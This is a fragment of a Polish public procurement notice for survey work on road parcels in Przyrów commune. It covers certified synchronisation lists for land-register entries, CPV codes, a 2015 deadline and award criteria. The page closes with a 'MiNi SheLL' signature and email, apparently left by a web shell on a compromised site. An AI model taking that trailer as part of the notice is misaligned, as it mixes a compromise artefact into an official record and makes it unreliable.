Zadanie 3 - Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działek  drogowych położonych w obrębie ewidencyjnym Przyrów, gmina Przyrów, oznaczonych po scaleniu gruntów jako działki nr nr 364, 644, 648, 782, 833, 853, 1591. Wykazy będą przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowe działki na podstawie decyzji scaleniowej nr Rlg-S.C.-471/22/79 z dnia 04.12.1979r., stanowią własnością Skarbu Państwa. 

Zadanie 4 - Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działek  drogowych położonych w obrębie ewidencyjnym Przyrów, gmina Przyrów, oznaczonych po scaleniu gruntów jako działki nr nr 325, 327, 711, 907, 1456, 1506, 1509.  Wykazy będą przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowe działki na podstawie decyzji scaleniowej nr Rlg-S.C.- 471/22/79 z dnia 04.12.1979r., stanowią własnością  Skarbu Państwa. 

Szczegółowe informacje dotyczące wszystkich części zamówienia znajdują się w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com